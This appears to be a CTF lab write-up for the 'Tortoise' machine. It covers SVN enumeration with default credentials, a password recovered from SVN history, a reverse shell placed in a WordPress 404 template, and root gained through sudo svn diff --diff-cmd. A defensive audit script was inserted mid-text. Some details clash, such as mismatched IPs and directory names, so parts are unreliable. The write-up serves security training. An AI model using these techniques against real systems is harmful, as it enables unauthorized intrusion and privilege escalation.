Mazesec_Tortoise

Target source: QQ group 660930334

Difficulty: Easy

I. Information gathering

1. Host discovery

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-29 12:36 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00047s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00044s latency).
MAC Address: 08:00:27:8E:AB:36 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.63
Host is up (0.00070s latency).
MAC Address: 08:00:27:6F:93:5E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.54 seconds

Target IP: 192.168.2.70

2. Port scanning

1) Full port scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.63
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-29 12:36 +0800
Nmap scan report for 192.168.2.63
Host is up (0.00057s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3690/tcp open svn
MAC Address: 08:00:27:6F:93:5E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds

Open ports: 22, 80, 3690

2) Detailed service scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80,3690 192.168.2.63
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-29 12:37 +0800
Nmap scan report for 192.168.2.63
Host is up (0.00059s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0 (protocol 2.0)
80/tcp open http nginx
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: Tortoise
3690/tcp open svnserve Subversion
MAC Address: 08:00:27:6F:93:5E (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.16 seconds

3) UDP scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.63
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-29 12:37 +0800
Nmap scan report for 192.168.2.63
Host is up (0.00065s latency).
All 100 scanned ports on 192.168.2.63 are in ignored states.
Not shown: 59 closed udp ports (port-unreach), 41 open|filtered udp ports (no-response)
MAC Address: 08:00:27:6F:93:5E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 58.74 seconds

II. Service enumeration and vulnerability discovery

1. HTTP service enumeration

Port 80 serves a website, which also exposes the domain name tortoise.dsz. There is a login form that requires a username and password.

2. SVN service

Subversion is a centralized version control system that plays a crucial role in managing a project's current and historical data. It is an open-source tool released under the Apache License, and it is widely recognized for its software version control and revision control capabilities, ensuring that users can efficiently track changes over time. Default port: 3690. Using the credentials found on the website together with the default accounts that exist in the SVN service, the following username/password pairs were found:

harry = harryssecret
sally = sallyssecret
lily = lilyssecret

harry = harryssecret
sally = sallyssecret
cathy = cathyspassword
lily = lilyssecret

Listing the repository root reveals a config.php:

┌──(root㉿kali)-[~]
└─# svn list svn://192.168.2.63/config.php
认证领域: <svn://192.168.2.63:3690> ec4c0778-aa1a-4bbf-a472-8cba06d4e45c
“harry”的密码: ************

config.php

┌──(root㉿kali)-[~]
└─# svn list svn://192.168.2.63/config.php
认证领域: <svn://192.168.2.63:3690> ec4c0778-aa1a-4bbf-a472-8cba06d4e45c
“harry”的密码:

认证领域: <svn://192.168.2.63:3690> ec4c0778-aa1a-4bbf-a472-8cba06d4e45c
用户名: sally
“sally”的密码: ************

config.php

Export the file contents:

┌──(root㉿kali)-[~/miaosec]
└─# svn export svn://192.168.2.63/config.php ./config.php
认证领域: <svn://192.168.2.63:3690> ec4c0778-aa1a-4bbf-a472-8cba06d4e45c
“sally”的密码: ************

┌──(root㉿kali)-[~/miaosec]
└─# cat config.php
db_user=getenv('DB_USER');\ndb_pass=getenv('DB_PASS');

Look at the commit log again:

┌──(root㉿kali)-[~/miaosec]
└─# svn log -v svn://192.168.2.63
认证领域: <svn://192.168.2.63:3690> ec4c0778-aa1a-4bbf-a472-8cba06d4e45c
“sally”的密码: ************

------------------------------------------------------------------------
r2 | root | 2026-01-23 20:13:55 +0800 (五, 2026-01-23) | 1 行
改变的路径:
M /config.php

Remove hardcoded credentials for security
------------------------------------------------------------------------
r1 | root | 2026-01-23 20:13:54 +0800 (五, 2026-01-23) | 1 行
改变的路径:
A /config.php

Initialize database config
------------------------------------------------------------------------

Export the original file contents from the first revision:

┌──(root㉿kali)-[~/miaosec]
└─# svn export -r 1 svn://192.168.2.63/config.php ./config_r1.php
认证领域: <svn://192.168.2.63:3690> ec4c0778-aa1a-4bbf-a472-8cba06d4e45c
“sally”的密码: ************

A config_r1.php
完成导出。

Credentials found: admin:S3cret_P@ss_2026

┌──(root㉿kali)-[~/miaosec]
└─# cat config_r1.php
db_user='admin'\ndb_pass='S3cret_P@ss_2026'
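As an added defender-side example (not part of the original write-up), the following Python script shows the check a repository owner should run after a commit like r2 above: it walks every revision of a file, not just HEAD, and reports credentials that were merely scrubbed from the latest revision but remain recoverable from history, so they can be rotated rather than assumed gone. SAMPLE_HISTORY is a constructed stand-in for the two revisions of config.php shown above, and the two regexes are assumptions of this example, not any Subversion API.

```python
import re
from typing import Dict, List, Tuple

# Hardcoded-credential assignments such as db_pass='...' (quoted literal only,
# so db_pass=getenv('DB_PASS') is deliberately not flagged).
SECRET_ASSIGNMENT = re.compile(
    r"""\b(?P<key>[A-Za-z_]*(?:pass(?:word)?|secret|token|api_key))\s*=\s*['"](?P<value>[^'"]+)['"]""",
    re.IGNORECASE,
)
# Commit messages that admit a secret was committed and later scrubbed.
SCRUB_HINT = re.compile(
    r"\b(?:remove|scrub|strip|delete)\b.*\b(?:credential|password|secret|key)",
    re.IGNORECASE,
)

# Constructed sample mirroring the two revisions of config.php seen above:
# rev -> (commit message, file content at that revision).
SAMPLE_HISTORY: Dict[int, Tuple[str, str]] = {
    1: ("Initialize database config",
        "db_user='admin'\ndb_pass='S3cret_P@ss_2026'"),
    2: ("Remove hardcoded credentials for security",
        "db_user=getenv('DB_USER');\ndb_pass=getenv('DB_PASS');"),
}


def find_secrets(text: str) -> List[Tuple[str, str]]:
    """Return (key, value) pairs for quoted credential assignments in text."""
    return [(m.group("key"), m.group("value")) for m in SECRET_ASSIGNMENT.finditer(text)]


def audit_history(history: Dict[int, Tuple[str, str]]) -> List[Tuple[int, str, str]]:
    """Walk every revision and return (rev, finding, detail) tuples:
    'recoverable'   - secret absent at HEAD but still readable from an old revision
    'at_head'       - secret hardcoded and still present in the latest revision
    'scrub_message' - commit message indicates a scrub, so the value must be rotated
    """
    head = max(history)
    head_secrets = set(find_secrets(history[head][1]))
    findings: List[Tuple[int, str, str]] = []
    for rev in sorted(history):
        message, content = history[rev]
        for key, value in find_secrets(content):
            kind = "at_head" if (key, value) in head_secrets else "recoverable"
            findings.append((rev, kind, key))
        if SCRUB_HINT.search(message):
            findings.append((rev, "scrub_message", message))
    return findings


if __name__ == "__main__":
    for rev, kind, detail in audit_history(SAMPLE_HISTORY):
        print(f"r{rev}: {kind}: {detail}")
```

In a real audit the history dictionary would be filled from `svn log` and `svn cat -r N`; the point is that any secret ever committed has to be rotated, because removing it in a later revision does not remove it from the repository.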

III. Getting a shell

With these credentials, we log in to the admin backend.

In Themes > Theme File Editor, the 404 template is edited to add the reverse shell command.

Requesting a non-existent page triggers the template and returns a shell:

┌──(root㉿kali)-[~/miaosec]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.63] 41855
id
uid=101(nginx) gid=102(nginx) groups=82(www-data),102(nginx),102(nginx)

IV. Privilege escalation

1. Getting the onehang user

Browsing the filesystem, a .backup.php is found inside localhost; it contains a credential, 1006b3921:

ls -la
total 12
drwxr-xr-x 2 root root 4096 Jan 26 21:23 .
drwxr-xr-x 5 root root 4096 Jan 26 21:24 ..
-rw-r--r-- 1 root root 1723 Jan 26 21:23 .backup.php
cat .backup.php
<?php
define('SECURE_KEY', '1006b3921');

final class BackupManager {
private string $root;
private string $destination;
....

The /home directory also reveals the username onehang:

ls -la /home
total 12
drwxr-xr-x 3 root root 4096 Jan 23 20:09 .
drwxr-xr-x 21 root root 4096 Jan 29 12:31 ..
drwxr-sr-x 2 onehang onehang 4096 Jan 23 22:01 onehang

Testing confirms that the login succeeds: onehang:1006b3921

┌──(root㉿kali)-[~]
└─# ssh onehang@192.168.2.63
onehang@192.168.2.63's password:
_
__ _____| | ___ ___ _ __ ___ ___
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
\ V V / __/ | (_| (_) | | | | | | __/
\_/\_/ \___|_|\___\___/|_| |_| |_|\___|

Tortoise:~$ id
uid=1001(onehang) gid=1001(onehang) groups=1001(onehang)

2. Getting root

Check sudo -l:

Tortoise:~$ sudo -l
[sudo] password for onehang:
Matching Defaults entries for onehang on Tortoise:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for onehang:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User onehang may run the following commands on Tortoise:
(ALL : ALL) /usr/bin/svn
PWD_PATH=$(pwd)
svnadmin create "$PWD_PATH/toroot"
svn checkout "file://$PWD_PATH/toroot"
cd toroot2
touch play
svn add play
sudo svn diff --diff-cmd /bin/sh play
nano toroot.sh
chmod +x toroot.sh
cat toroot.sh
sudo svn add toroot.sh
sudo /usr/bin/svn diff --diff-cmd /home/onehang/toroot2/toroot.sh /home/onehang/toroot2/play

Mazesec_Tortoise
http://miao-sec.github.io/Maze-sec/Mazesec-Tortoise/
Author: Miao
Published: January 29, 2026
License: BY-MIAO